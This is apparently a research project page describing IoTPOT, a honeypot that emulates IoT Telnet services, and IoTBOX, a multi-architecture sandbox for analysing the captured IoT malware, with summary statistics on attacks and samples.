Please note that the following research description is from our preliminary results presented at USENIX WOOT2015. IoTPOT now emulates not only telnet but also other vulnerable services including those of specific devices with distributed proxy sensors in several countries. We have much more malware samples and have observed diverse behavior of IoT malware, such as click fraud and stealing credentials for pay-per-views. For more information, please also check our news articles.
We analyze the increasing threats against IoT devices. We first analyze Telnet-based scans in darknet, revealing that attacks on Telnet have rocketed since 2014. Moreover, by grabbing Telnet banners and web contents of the attackers, we confirm that the majority of attacks indeed stem from IoT devices.
Motivated by this, we implement IoTPOT, a novel honeypot to emulate Telnet services of various IoT devices to analyze ongoing attacks in depth. IoTPOT consists of a frontend low-interaction responder cooperating with backend high-interaction virtual environments called IoTBOX. IoTBOX operates various virtual environments commonly used by embedded systems for different CPU architectures. During 39 days of operation, we observed 76,605 download attempts of malware binaries from 16,934 visiting IP. We also confirm that none of these binaries could have been captured by existing honeypots that handle Telnet protocol such as honeyd and telnet password honeypot because they are not able to handle different incoming commands sent by the attackers.
We manually downloaded 43 distinct malware samples and found out that they run on 11 different CPU architectures. Among 43 collected samples, 39 samples were new to the database of VirusTotal(as of 2015/05/13) showing a gap of capturing utilities for this type of threat. Out of 4 samples that were in VirusTotal, 2 of them were not detected by any of the 57 A/Vs of VirusTotal (as of 2015/05/13).
In order to analyze these captured malware binaries, we implement IoTBOX, the first malware analysis environment for IoT devices. IoTBOX supports 8 CPU architectures, spanning MIPS, ARM, and PPC. The sandbox analysis of 17 samples by IoTBOX revealed that the samples are used to perform 10 different types of DDoS attacks and port 23 scans.
Finally, combining the observations results of IoTPOT with the sandbox analysis by IoTBOX, we confirm that:
This is a joint work between Yokohama National University, Japan and Saarland University, Germany.
Last Update: 2016/06/27